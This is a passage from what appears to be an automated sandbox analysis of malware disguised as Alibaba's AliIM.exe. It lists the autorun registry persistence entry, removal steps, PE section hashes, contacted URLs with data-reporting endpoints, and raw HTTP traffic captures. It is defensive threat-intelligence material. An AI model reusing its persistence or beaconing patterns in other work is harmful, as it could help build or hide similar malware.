%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[2].txt (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery-1.10.2.min_f2fb5194[1].js (3234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\baidu_jgylogo3[1].gif (705 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RhdmcnkZlr" = "c:\windows\ime\appfht.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Alibaba software (Shanghai) Corporation.
Product Name: AliIM ????
Product Version: 1, 0, 0, 1
Legal Copyright: Alibaba software (Shanghai) Corporation. All rights reserved.
Legal Trademarks:
Original Filename: AliIM.exe
Internal Name: TaMengServer
File Version: 1, 0, 0, 1
File Description: AliWangWang
Comments:
Language: English (United States)
Company Name: Alibaba software (Shanghai) Corporation.Product Name: AliIM ????Product Version: 1, 0, 0, 1Legal Copyright: Alibaba software (Shanghai) Corporation. All rights reserved.Legal Trademarks: Original Filename: AliIM.exeInternal Name: TaMengServerFile Version: 1, 0, 0, 1File Description: AliWangWangComments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 49330 | 53248 | 3.99991 | 76009a14b2608ebd528d5e426a71a1f4 |
| .rdata | 57344 | 5864 | 8192 | 2.80413 | 1af73592d6735a9e00247cfbd97e81c8 |
| .data | 65536 | 5652 | 4096 | 2.69461 | 79b9742b60d27cb1d1e6a1b87ab4b8a5 |
| .rsrc | 73728 | 5303804 | 5304320 | 5.537 | 908d2014a591f89f270a206aa081c285 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.a.shifen.com/ | |
| hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin | |
| hxxp://imgcache.qq.com.cdngc.net/ptlogin/ver/10107/js/xui.js?v=10007 | 174.35.73.164 |
| hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/icons.gif | 174.35.73.164 |
| hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/load.gif | 174.35.73.164 |
| hxxp://ui.ptlogin2.qq.com/cgi-bin/report?id=256040 | |
| hxxp://www.it885.com.cn/web/get_ad4.asp?type=loadall&machinename=XP9-A8A67A25&cr=yes | 124.248.254.82 |
| hxxp://1.rwdns.com/GetData.asp | 103.20.194.10 |
| hxxp://1.rwdns.com/zztj/yeshe.html | 103.20.194.10 |
| hxxp://1.rwdns.com/SetData.asp | 103.20.194.10 |
| hxxp://yd.ecoma.glb0.lxdns.com/ | |
| hxxp://1111.ip138.com/ic.asp | 183.238.101.232 |
| hxxp://85a8e168cf20d7d6.cdn.fhldns.com/xc.txt | |
| hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=4690803&web_id=4690803 | |
| hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=4690803&t=z | |
| hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=127307938 | 42.120.219.171 |
| hxxp://z.gds.cnzz.com/stat.htm?id=4690803&r=&lg=en-us&ntime=none&cnzz_eid=1807063244-1419803827-&showp=1024x768&t=&h=1&rnd=1176270916 | |
| hxxp://cnzz.mmstat.com/app.gif?&cna=tGonDZSqqmQCAbhrJibBL0IA | 42.120.219.171 |
| hxxp://flow3002.6299.cc/ClientAPI/flowtaskAPI.aspx | 123.183.220.234 |
| hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/load.gif | 174.35.73.164 |
| hxxp://imgcache.qq.com/ptlogin/ver/10107/js/xui.js?v=10007 | 174.35.73.164 |
| hxxp://c.cnzz.com/core.php?web_id=4690803&t=z | 66.102.255.55 |
| hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin | 112.90.83.106 |
| hxxp://pcookie.cnzz.com/app.gif?&cna=tGonDZSqqmQCAbhrJibBL0IA | 42.120.219.171 |
| hxxp://s6.cnzz.com/stat.php?id=4690803&web_id=4690803 | 1.99.192.15 |
| hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif | 174.35.73.164 |
| hxxp://www.baidu.com/ | 180.76.3.151 |
| hxxp://www.ip138.com/ | 218.92.221.155 |
| hxxp://wangbao.6299.cc/xc.txt | 183.60.235.66 |
| hxxp://hzs9.cnzz.com/stat.htm?id=4690803&r=&lg=en-us&ntime=none&cnzz_eid=1807063244-1419803827-&showp=1024x768&t=&h=1&rnd=1176270916 | 1.122.192.17 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /app.gif?&cna=tGonDZSqqmQCAbhrJibBL0IA HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Sun, 28 Dec 2014 21:57:08 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=tGonDZSqqmQCAbhrJibBL0IA; expires=Wed, 25-Dec-24 21:57:08 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;..
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:23 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 398
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Date: Sun, 28 Dec 2014 21:57:23 GMT..Server: PWS/8.1.20.9..X-Px: ht h0-s2078.p9-jfk.cdngp.net..ETag: "54977f24-23d0"..Cache-Control: max-age=600..Expires: Sun, 28 Dec 2014 22:00:45 GMT..Age: 398..Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT..Connection: keep-alive......
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:28 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 403
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:28 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:07 GMT
Age: 7041
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /zztj/yeshe.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1.rwdns.com
Connection: Keep-Alive
GET /zztj/yeshe.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1.rwdns.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 99
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQSQSRA=LFMOHFPDLMIBCIOIGBEMBAOK; path=/
Cache-control: private
<script src="hXXp://s6.cnzz.com/stat.php?id=4690803&web_id=4690803" language="JavaScript"></script>..
GET / HTTP/1.1
Host: VVV.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:35 GMT
Content-Type: text/html
Content-Length: 14613
Last-Modified: Wed, 03 Sep 2014 02:48:32 GMT
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=E130BBF5D4750DB2D958417BF0FEDBE0:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUPSID=E130BBF5D4750DB2D958417BF0FEDBE0; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=0; path=/
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Server: BWS/1.1
Pragma: no-cache
Cache-control: no-cache
BDPAGETYPE: 1
BDQID: 0xd4fd7e9a0010ad88
BDUSERID: 0
Accept-Ranges: bytes
<!DOCTYPE html><!--STATUS OK-->..<html>..<head>...<meta http-equiv="content-type" content="text/html;charset=utf-8">...<meta http-equiv="X-UA-Compatible" content="IE=Edge">...<link rel="dns-prefetch" href="//s1.bdstatic.com"/>...<link rel="dns-prefetch" href="//t1.baidu.com"/>...<link rel="dns-prefetch" href="//t2.baidu.com"/>...<link rel="dns-prefetch" href="//t3.baidu.com"/>...<link rel="dns-prefetch" href="//t10.baidu.com"/>...<link rel="dns-prefetch" href="//t11.baidu.com"/>...<link rel="dns-prefetch" href="//t12.baidu.com"/>...<link rel="dns-prefetch" href="//b1.bdstatic.com"/>...<title>...........................</title>...<link href="hXXp://s1.bdstatic.com/r/www/cache/static/home/css/index.css" rel="stylesheet" type="text/css" />...<!--[if lte IE 8]><style index="index" >#content{height:480px\9}#m{top:260px\9}</style><![endif]-->...<!--[if IE 8]><style index="index" >#u1 a.mnav,#u1 a.mnav:visited{font-family:simsun}</style><![endif]-->...<script>var hashMatch = document.location.href.match(/# (.*wd=[^&]. )/);if (hashMatch && hashMatch[0] && hashMatch[1]) {document.location.replace("hXXp://" location.host "/s?" hashMatch[1]);}var ns_c = function(){};</script>...<script>function h(obj){obj.style.behavior='url(#default#homepage)';var a = obj.setHomePage('//VVV.baidu.com/');}</script>...<noscript><meta http-equiv="refresh" conte
<<< skipped >>>
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:28 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:57 GMT
Age: 1771
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /stat.htm?id=4690803&r=&lg=en-us&ntime=none&cnzz_eid=1807063244-1419803827-&showp=1024x768&t=&h=1&rnd=1176270916 HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs9.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Sun, 28 Dec 2014 21:57:08 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:45 GMT
Server: PWS/8.1.20.9
X-Px: ms h0-s2078.p9-jfk ( h0-s2071.p9-jfk), ht h0-s2071.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 360
Content-Length: 3528
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Px-Uncompress-Origin: 9168
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
6.E....)..<n_.?.!......R...Jy./.n......?.. .>uG. .>...;/.l..'.L.......tn?[....X.0..o1k$..BE....g..k.*.nu.F........x.E....................m....2A3O_.|k.3.;.2dKbTW..{.Nn..o..xeL.![ .(.k.9..l.......4....X.....*.U...H....T0...I...(. .)....8R;..[{[.g.Z...$gV....Hf`j.X..E.J!.riK.ET"XR...0G...r(..HR..m...Y.........DY...d ...[..q.nQ.V....<L.lZ...V..o..^...d.4.3..c.97...g.7....C.l.A....A..2mW.f@k.f`'....`[mb.t..............a..........)...;.7....X........T$.EU...e.(2.} .n ........Uk>..^UQ.cx&..l..\U....,I...Z<.&3. .,R....e".r...`.._."c.....TLu.<>...h......?.......R>.g.....}..O...I_....&..e..L!)N.]-sL....#K..#.............Y.S.H.. f6gKkG.q .6.E.!..`...U,..Ic[ KB........^.6w..bMO.g.1.t..Y..^.4...|.y..A...l......................6...p.^6l.....F.^..K.....V.Y....K....e. ...G.1.{OM...6..._...M....$.9R..`{....'.....7..U....%.bm.q....QJ..d..Q2.2?..?\N.p...^..?........xi..(..{.....Z)OR...9..F....K..Zx.>~.xrIX...d..Qz.$!..6.inM'.,...........V.R.Z!0...>.....).E..m...<U.|.;t.,....`...8g...4j.......^.....[....>.....?zS....=1..\/.|.@..&.!..#....R.Kx:.3.YjT..y..Ga...illnm...:=......z=.I...;..'.... .4`.3...w.....a...`g...K.Yq...a.O......b......o'gG..`.b09..>.:9...n....'.............7..n....O'...t.4w|zD.GZ..0..E.`(8g.06<..y;...`..G^...........W"V...2...#..Rf...O..?=.ou.......N=..pxR'.W..#^.........DQ. .HP..^...t.n.....x..;.g\...W.|9.Ia...u.....q."...O.....l...N..1{P..1...dW I.`C7.&>....E.!O0....;D......s.6.:.V.j.}......PF.X(V1.`.t..g.....?..A..3.~.?...<.S .l...fF.....,....#f..S`...,8.pJH.
<<< skipped >>>
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:52 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 367
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:57 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 372
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:57 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7011
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:17 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1761
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:23 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:57 GMT
Age: 1766
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:23 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:07 GMT
Age: 7036
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: VVV.ip138.com
<<< skipped >>>
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:02 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1746
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
....
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:07 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:45 GMT
Age: 382
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:12 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:44 GMT
Age: 388
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
....
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:12 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7026
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
